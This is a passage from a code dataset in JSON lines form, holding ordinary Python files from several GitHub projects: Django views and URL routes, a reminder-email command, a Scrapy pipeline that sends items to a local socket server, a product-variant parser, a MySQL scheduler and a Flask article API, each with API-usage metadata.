{"api_name": "os.path", "line_number": 328, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 328, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "obspy.core.imaging", "line_number": 354, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 354, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "obspy.core.core.util.AttribDict", "line_number": 415, "usage_type": "call"}, {"api_name": "obspy.core.core", "line_number": 415, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 415, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 418, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 418, "usage_type": "attribute"}, {"api_name": "obspy.core.signal.spectral_estimation.get_nhnm", "line_number": 464, "usage_type": "call"}, {"api_name": "obspy.core.signal", "line_number": 464, "usage_type": "attribute"}, {"api_name": "obspy.core", "line_number": 464, "usage_type": "name"}, {"api_name": "obspy.core.signal.spectral_estimation.get_nlnm", "line_number": 464, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 481, "usage_type": "attribute"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 515, "usage_type": "attribute"}, {"api_name": "numpy.geterr", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.seterr", "line_number": 527, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "numpy.seterr", "line_number": 541, "usage_type": "call"}]} +{"seq_id": "44396877940", "text": "from django.core.management.base import BaseCommand, CommandError\nfrom day_counter.models import Counter\nfrom users.models import User\nfrom datetime import timedelta, datetime\nfrom django.template import loader\nfrom grodvidar.settings import DOMAIN\nfrom django.core.mail import get_connection, EmailMultiAlternatives\nimport html2text\n\n\ndef send_mass_html_mail(datatuple, fail_silently=False, user=None, password=None,\n connection=None):\n \"\"\"\n Given a datatuple of (subject, text_content, html_content, from_email,\n recipient_list), sends each message to each recipient list. Returns the\n number of emails sent.\n\n If from_email is None, the DEFAULT_FROM_EMAIL setting is used.\n If auth_user and auth_password are set, they're used to log in.\n If auth_user is None, the EMAIL_HOST_USER setting is used.\n If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.\n\n \"\"\"\n connection = connection or get_connection(\n username=user, password=password, fail_silently=fail_silently)\n messages = []\n for subject, text, html, from_email, recipient in datatuple:\n message = EmailMultiAlternatives(subject, text, from_email, recipient)\n message.attach_alternative(html, 'text/html')\n messages.append(message)\n return connection.send_messages(messages)\n\n\nclass Command(BaseCommand):\n help = 'Sends an email to all followers for every counter'\n\n def handle(self, *args, **kwargs):\n messages = ()\n for user in User.objects.filter(enable_reminders=True):\n date = (datetime.today() + timedelta(user.reminder_days)).date()\n followed_counters = Counter.objects.filter(followers=user, end_date=date)\n owned_counters = Counter.objects.filter(user=user, end_date=date)\n if followed_counters.exists() or owned_counters.exists():\n html_message = loader.render_to_string(\n 'counter/messages/counter_reminder.html',\n {\n 'user_name': user.first_name or user.username,\n 'days_left': user.reminder_days,\n 'owned_counters': owned_counters,\n 'followed_counters': followed_counters,\n 'domain': DOMAIN,\n }\n )\n text_message = html2text.html2text(html_message)\n messages += (('Counter reminders', text_message, html_message, None, [user.email]),)\n send_mass_html_mail(messages)\n\n\n", "repo_name": "GrodVidar/day_counter", "sub_path": "day_counter/management/commands/email_followers.py", "file_name": "email_followers.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.core.mail.get_connection", "line_number": 24, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 28, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 34, "usage_type": "name"}, {"api_name": "users.models.User.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "users.models.User.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "users.models.User", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "day_counter.models.Counter", "line_number": 41, "usage_type": "name"}, {"api_name": "day_counter.models.Counter.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "day_counter.models.Counter.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "day_counter.models.Counter", "line_number": 42, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 44, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 44, "usage_type": "name"}, {"api_name": "grodvidar.settings.DOMAIN", "line_number": 51, "usage_type": "name"}, {"api_name": "html2text.html2text", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "38795305265", "text": "from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n #===============================>\n # 거래처관리\n #===============================<\n # 거래처 리스트(Json)\n url(r'^accountman/json/list/$', views.accountmanJsonList, name='accountman__json__list'),\n # 거래처 정보 수정(Json)\n url(r'^accountman/json/modify/$', views.accountmanJsonModify, name='accountman__json__modify'),\n # 거래처 정보 등록(Json)\n url(r'^accountman/json/regist/$', views.accountmanJsonRegist, name='accountman__json__regist'),\n # 거래처 상세 화면\n url(r'^accountman/detail/$', views.accountmanDetailCV, name='accountman__detail'),\n # 거래처 등록 화면\n url(r'^accountman/regist/$', views.accountmanRegistCV, name='accountman__regist'),\n\n #===============================>\n # 직원관리\n #===============================<\n # 직원 리스트(Json)\n url(r'^staffman/json/list/$', views.staffmanJsonList, name='staffman__json__list'),\n # 직원 정보 수정(Json)\n url(r'^staffman/json/modify/$', views.staffmanJsonModify, name='staffman__json__modify'),\n # 직원 정보 등록(Json)\n url(r'^staffman/json/regist/$', views.staffmanJsonRegist, name='staffman__json__regist'),\n # 직원 상세 화면\n url(r'^staffman/detail/$', views.staffmanDetailCV, name='staffman__detail'),\n # 직원 등록 화면\n url(r'^staffman/regist/$', views.staffmanRegistCV, name='staffman__regist'),\n\n #===============================>\n # 매장관리\n #===============================<\n # 매장 리스트(Json)\n url(r'^shopman/json/list/$', views.shopmanJsonList, name='shopman__json__list'),\n # 매장 정보 수정(Json)\n url(r'^shopman/json/modify/$', views.shopmanJsonModify, name='shopman__json__modify'),\n # 매장 정보 등록(Json)\n url(r'^shopman/json/regist/$', views.shopmanJsonRegist, name='shopman__json__regist'),\n # 매장 상세 화면\n url(r'^shopman/detail/$', views.shopmanDetailCV, name='shopman__detail'),\n # 매장 등록 화면\n url(r'^shopman/regist/$', views.shopmanRegistCV, name='shopman__regist'),\n\n #===============================>\n # 기본설정\n #===============================<\n # 기본설정 정보 수정(Json)\n url(r'^basicman/json/modify/$', views.basicmanJsonModify, name='basicman__json__modify'),\n]\n", "repo_name": "007babe/ntelRepo", "sub_path": "ntelProject/src/setting/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "24091622760", "text": "from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\nimport random\n\nfrom datetime import date\nfrom pet_ninja import settings\nimport datetime\nimport stripe\n\nfrom django.http import JsonResponse\n\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\ndef index(request):\n return render(request,'one/home.html')\ndef register(request):\n return render(request,'one/register.html')\ndef registering(request):\n if request.method=='POST':\n result = User.objects.validations(request.POST)\n if 'errors' in result:\n for key,value in result['errors'].items():\n messages.error(request,value) \n return redirect('/register') \n else:\n messages.success(request,'You have successfully registered')\n return redirect('/')\n return redirect('/')\ndef logging_in(request):\n if request.method=='POST':\n users_with_same_email = User.objects.filter(email=request.POST['email'])\n if len(users_with_same_email) > 0:\n user_1=users_with_same_email.first()\n if bcrypt.checkpw(request.POST['password'].encode(),user_1.password.encode()):\n request.session['id'] = user_1.id\n request.session['display_name'] = user_1.display_name\n return redirect('/user')\n else:\n messages.error(request,'Wrong password')\n return redirect('/invalid')\n else:\n messages.error(request,'Email does not exist')\n return redirect('/invalid')\ndef invalid(request):\n return render(request,'one/invalid.html')\n\n# =====================================\n# USER HOMEPAGE\n# =====================================\ndef user_page(request):\n if \"id\" not in request.session:\n return redirect('/')\n user = User.objects.get(id=request.session['id'])\n weapons_user_has = user.weapons.all()\n auras_user_has = user.auras.all()\n backgrounds_user_has = user.backgrounds.all()\n if user.favorite_weapon != \"\":\n favorite_weapon = Weapon.objects.get(name=user.favorite_weapon)\n else:\n favorite_weapon = \"\";\n if user.favorite_aura != \"\":\n favorite_aura = Aura.objects.get(name=user.favorite_aura)\n else:\n favorite_aura = \"\";\n if user.favorite_background != \"\":\n favorite_background = Background.objects.get(name=user.favorite_background)\n else:\n favorite_background = \"\";\n\n context = {\n 'weapons_owned': weapons_user_has,\n 'auras_owned':auras_user_has,\n 'backgrounds_owned':backgrounds_user_has,\n 'favorite_weapon': favorite_weapon,\n 'favorite_aura': favorite_aura,\n 'favorite_background':favorite_background\n }\n return render(request,'one/user.html',context)\n\ndef user_info(request):\n if \"id\" not in request.session:\n return redirect('/')\n user =User.objects.get(id=request.session['id'])\n today = date.today()\n age= today.year - user.dob.year - ((today.month,today.day) < (user.dob.month, user.dob.day))\n context = {\n 'user':user,\n 'age':age\n }\n return render(request,'one/user_info.html',context)\ndef view_user(request,userid):\n if \"id\" not in request.session:\n return redirect('/')\n user = User.objects.get(id=userid)\n if user.favorite_weapon != \"\":\n favorite_weapon = Weapon.objects.get(name=user.favorite_weapon)\n else:\n favorite_weapon = \"\";\n if user.favorite_aura != \"\":\n favorite_aura = Aura.objects.get(name=user.favorite_aura)\n else:\n favorite_aura = \"\";\n if user.favorite_background != \"\":\n favorite_background = Background.objects.get(name=user.favorite_background)\n else:\n favorite_background = \"\";\n today = date.today()\n age= today.year - user.dob.year - ((today.month,today.day) < (user.dob.month, user.dob.day))\n context = {\n 'user':user,\n 'age':age,\n 'favorite_background':favorite_background,\n 'favorite_aura':favorite_aura,\n 'favorite_weapon':favorite_weapon\n }\n return render(request,'one/view_user.html',context)\n \ndef user_info_edit(request):\n user= User.objects.get(id=request.session['id'])\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.display_name = request.POST['display_name']\n user.email = request.POST['email']\n user.programming_language= request.POST['programming_language']\n user.location = request.POST['location']\n user.save()\n return redirect('/user/info')\n \ndef user_edit(request):\n if \"id\" not in request.session:\n return redirect('/')\n user =User.objects.get(id=request.session['id'])\n context = {\n 'user':user\n } \n return render(request,'one/user_edit.html',context)\n\ndef ranking_page(request):\n if \"id\" not in request.session:\n return redirect('/')\n everyone = User.objects.order_by(\"-point\")\n context = {\n 'peoples': everyone\n }\n return render(request,'one/ranking.html',context)\n\ndef favorite_item(request,category):\n user = User.objects.get(id=request.session['id'])\n if(category == \"weapon\"):\n item = Weapon.objects.get(image=request.POST['name'])\n user.favorite_weapon = item.name\n elif(category == \"aura\"):\n item= Aura.objects.get(image=request.POST['name'])\n user.favorite_aura = item.name\n elif(category == \"background\"):\n item= Background.objects.get(image=request.POST['name'])\n user.favorite_background = item.name\n \n user.save()\n return redirect('/user')\n# =====================================\n# CLASSROOM\n# =====================================\ndef classroom(request):\n if \"id\" not in request.session:\n return redirect('/')\n return render(request,'one/classroom.html')\ndef classroom_questions(request,language,difficulty,number):\n if \"id\" not in request.session:\n return redirect('/')\n q = Question.objects.filter(category=language,difficulty= difficulty)\n q = q.get(number=number)\n a = Answer.objects.filter(question=number)\n context = {\n 'questions': q,\n 'answers':a\n }\n return render(request,'one/classroom_questions.html',context)\n\ndef check_answers(request): \n if \"count\" not in request.session:\n request.session['count'] = 0;\n if request.POST['answer'] == \"True\":\n request.session['count'] += 1;\n if \"answered\" not in request.session:\n request.session['answered']= 0;\n request.session['answered']+=1;\n if request.session['answered'] > 9:\n return redirect('/classroom/end_of_quiz')\n \n print(request.session['answered'])\n return redirect ('/classroom/{}/{}/{}'.format(request.POST['category'],request.POST['difficulty'],int(request.POST['number']) + 1))\ndef end_of_quiz(request):\n if \"id\" not in request.session:\n return redirect('/')\n u = User.objects.get(id=request.session['id'])\n u.point+=request.session['count']\n u.gold+= request.session['count']\n u.save()\n return render(request,'one/endofquiz.html')\ndef ending(request):\n request.session['count'] = 0;\n request.session['answered'] = 0;\n return redirect('/user')\n\n\n# ===================================\n# MALL\n# ==================================\ndef mall(request):\n if \"id\" not in request.session:\n return redirect('/')\n golds = Gold.objects.all()\n context = {\n 'stripe_key': settings,\n 'golds': golds\n }\n return render(request,'one/mall.html',context)\ndef mall_weapon(request,category):\n if \"id\" not in request.session:\n return redirect('/')\n if(category == \"weapon\"):\n allItems = Weapon.objects.all();\n elif(category == \"aura\"):\n allItems = Aura.objects.all();\n elif(category == \"background\"):\n allItems = Background.objects.all();\n category = category\n context={\n 'weapons': allItems,\n 'category': category\n }\n print(context)\n return render(request,'one/mall_weapon.html',context)\ndef buy_item(request,category,id):\n user = User.objects.get(id=request.session['id'])\n if(category == \"weapon\"):\n item_being_bought = Weapon.objects.get(id=id)\n elif(category == \"aura\"):\n item_being_bought = Aura.objects.get(id=id)\n elif(category == \"background\"):\n item_being_bought = Background.objects.get(id=id)\n\n if user.gold >= item_being_bought.price:\n item_being_bought.owner.add(request.session['id'])\n item_being_bought.save()\n user.gold -= item_being_bought.price\n user.save()\n else:\n alert('Not enough gold!')\n return redirect('/user')\ndef charge(request):\n if request.method == \"POST\":\n token = request.POST.get(\"stripeToken\")\n\n try:\n charge = stripe.Charge.create(\n amount = int(request.POST['price'],0),\n currency = \"usd\",\n source = token,\n description = \"The product charged to the user\"\n )\n except stripe.error.CardError as ce:\n return False, ce\n\n else:\n user = User.objects.get(id=request.session['id'])\n user.gold += int(request.POST['amount'])\n user.save()\n return redirect('/user')\n\n# ====================================\n# MISC \n# =====================================\ndef logout(request):\n request.session.clear();\n return redirect('/')\ndef adding(request):\n return render(request,'one/adding.html')\n\ndef addinga(request):\n Answer.objects.create(\n content = request.POST['content'],\n correct= request.POST['correct'],\n question_id=request.POST['question_id']\n )\n return redirect('/adding')\ndef addingq(request):\n Question.objects.create(\n content=request.POST['content'],\n difficulty=request.POST['difficulty']\n )\n return redirect('/adding')\n\n", "repo_name": "Mykohnguyen/codingme", "sub_path": "apps/one/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "stripe.api_key", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pet_ninja.settings.STRIPE_SECRET_KEY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pet_ninja.settings", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 28, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "bcrypt.checkpw", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 41, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 44, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 109, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 109, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 133, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 168, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 169, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 172, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 180, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 191, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 194, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 206, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 214, "usage_type": "call"}, {"api_name": "pet_ninja.settings", "line_number": 217, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 220, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 223, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 236, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 253, "usage_type": "call"}, {"api_name": "stripe.Charge.create", "line_number": 259, "usage_type": "call"}, {"api_name": "stripe.Charge", "line_number": 259, "usage_type": "attribute"}, {"api_name": "stripe.error", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 272, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 279, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 281, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 289, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 295, "usage_type": "call"}]} +{"seq_id": "12082766115", "text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n# wang:第一步 导入相应包\nimport os\nimport json\nfrom socket import *\nimport time\n#wang:第一步结束\nimport json\nimport codecs\n\n\nclass ZhuoboPipeline(object):\n def __init__(self):\n\n # wang:第二步 创建(如果不存在),或者直接打开追加日志文件 存放错误记录\n self.filename = open(\"F:/logs_of_scrapyserver/logs.txt\", \"a\")\n # wang:第二步结束\n\n # wang:第三步 进行连接初始化\n self.HOST = 'localhost' # 因为我是在同一台机器上运行,所以是localhost,不同主机的话,此处需要改成服务器地址\n self.PORT = 8880 # 主机端口\n self.BUFSIZ = 1024 # 缓冲区\n self.ADDR = (self.HOST, self.PORT)\n self.tcpCliSock = socket(AF_INET, SOCK_STREAM) # 客户端套接字\n\n connect = self.tcpCliSock.connect((self.HOST, self.PORT))\n # wang:第三步结束\n def process_item(self, item, spider):\n # wang:第四步 进行数据包装与传送\n text = json.dumps(dict(item), ensure_ascii=False)\n i_timessend = 0;\n while True:\n try:\n self.tcpCliSock.send(text.encode(\"ANSI\")) # 发送数据\n print(\"\\n发送成功\\n\")\n break\n except:\n if i_timessend >= 3:\n self.filename.write((\"Send \" + text + \" failed!\\nTime:\" + time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(\n time.time()))))\n print(\"程序终止!原因:向数据库服务器三次发送数据失败!相关数据已记录在错误日志,路径为:\" + \"F:\\logs_of_scrapyserver\\logs.txt\")\n self.tcpCliSock.close()\n exit()\n i_timessend += 1;\n print(\"\\n开始等待数据反馈\\n\")\n recvdata = self.tcpCliSock.recv(15)\n if not recvdata: # 对方断开连接\n print(\"对方断开连接!\")\n self.tcpCliSock.close()\n if recvdata[0:7] != b'success':\n if recvdata[0:13] == b'data too long':\n self.filename.write((\n \"Send \" + text + \" Warning:the data your send is too long(more than 1024字符)!\\nTime:\" + time.strftime(\n '%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))))\n else:\n print(\"主机无法接收,主动断开连接!\")\n self.tcpCliSock.close()\n # wang:第四步 数据传送结束\n return item\n\n def close_spider(self, spider):\n self.filename.close()\n\n\n\n\n\n\n\n", "repo_name": "Wang-future/Jobs_Come", "sub_path": "code/数据爬取端/Zhuobo/Zhuobo/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 3023, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.dumps", "line_number": 35, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 44, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 59, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "41792035335", "text": "import lxml.html\nimport json\n\n\nclass NikeVariants(object):\n\n def setupSC(self, response):\n \"\"\" Call it from SC spiders \"\"\"\n self.tree_html = lxml.html.fromstring(response.body)\n\n def setupCH(self, tree_html):\n \"\"\" Call it from CH spiders \"\"\"\n self.tree_html = tree_html\n\n def _find_between(self, s, first, last):\n try:\n start = s.index(first) + len(first)\n end = s.index(last, start)\n return s[start:end]\n except ValueError:\n return \"\"\n\n def _variants(self):\n try:\n product_json_text = self.tree_html.xpath(\n \"//script[@id='product-data']/text()\")[0]\n product_json = json.loads(product_json_text)\n except Exception as _:\n product_json = None\n\n variant_list = []\n\n if product_json[\"inStockColorways\"]:\n for swatch in product_json[\"inStockColorways\"]:\n variant_item = {}\n properties = {\"color\": swatch[\"colorDescription\"]}\n variant_item[\"properties\"] = properties\n variant_item[\"price\"] = float(self.tree_html.xpath(\n \"//meta[@property='og:price:amount']/@content\")[0])\n variant_item[\"in_stock\"] = True \\\n if swatch[\"status\"] == \"IN_STOCK\" else False\n variant_item[\"url\"] = swatch[\"url\"]\n variant_item[\"selected\"] = True \\\n if \"pid-\" + str(product_json[\"productId\"]) \\\n in swatch[\"url\"] else False\n variant_list.append(variant_item)\n\n if variant_list:\n return variant_list\n\n return None\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "spiders_shared_code/nike_variants.py", "file_name": "nike_variants.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lxml.html.html.fromstring", "line_number": 9, "usage_type": "call"}, {"api_name": "lxml.html.html", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lxml.html", "line_number": 9, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "70130663554", "text": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Author: leeyoshinari\r\nimport time\r\nimport traceback\r\nimport pymysql\r\nfrom common.config import getServer\r\nfrom common.logger import logger\r\n\r\n\r\nclass Schedule:\r\n def __init__(self):\r\n self.con = None\r\n self.cursor = None\r\n self.res = None\r\n\r\n self.sql = \"select a.id, b.hash from (select max(id) id, answer_id from simple_answer where hash is not null \" \\\r\n \"and update_time > '{}'group by answer_id) a left join simple_answer b on a.id = b.id\"\r\n\r\n def connect(self):\r\n self.con = pymysql.connect(host=getServer('db_host'), user=getServer('db_user'), port=int(getServer('db_port')),\r\n password=getServer('db_pwd'), database=getServer('db_name'))\r\n self.cursor = self.con.cursor()\r\n\r\n def get_result(self):\r\n try:\r\n self.connect()\r\n self.cursor.execute(self.sql.format(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()-8640000))))\r\n self.res = self.cursor.fetchall()\r\n except:\r\n logger.error(traceback.format_exc())\r\n del self.cursor, self.con\r\n", "repo_name": "leeyoshinari/image_video", "sub_path": "common/scheduler.py", "file_name": "scheduler.py", "file_ext": "py", "file_size_in_byte": 1169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "common.config.getServer", "line_number": 21, "usage_type": "call"}, {"api_name": "common.config.getServer", "line_number": 22, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 28, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "common.logger.logger.error", "line_number": 31, "usage_type": "call"}, {"api_name": "common.logger.logger", "line_number": 31, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "2962415198", "text": "from flask import request\n\nfrom app.api_docs.v1 import article as api_doc\nfrom app.libs.error_code import Success\nfrom app.libs.redprint import RedPrint\nfrom app.models.article import Article\nfrom app.validators.forms import PaginateValidator\n\napi = RedPrint(name='article', description='Article', api_doc=api_doc)\n\n\n@api.route('/upload_and_parse_url', methods=['POST'])\n@api.doc()\ndef upload_and_parse_url():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n editorial_topic_id = request_body['editorial_topic_id']\n target_url = request_body['target_url']\n linked_editorial_topic = Article.upload_and_parse_url(\n editorial_topic_id=editorial_topic_id,\n target_url=target_url)\n return Success(linked_editorial_topic)\n\n\n@api.route('/create_article', methods=['POST'])\n@api.doc()\ndef create_article():\n request_body = request.get_json()\n # user_id = request_body['user_id']\n editorial_topic_id = request_body['editorial_topic_id']\n article_id = request_body['article_id']\n linked_editorial_topic = Article.create_article(\n editorial_topic_id=editorial_topic_id,\n article_id=article_id)\n return Success(linked_editorial_topic)\n\n\n@api.route('/delete_tag_from_article', methods=['POST'])\n@api.doc()\ndef delete_tag_from_article():\n request_body = 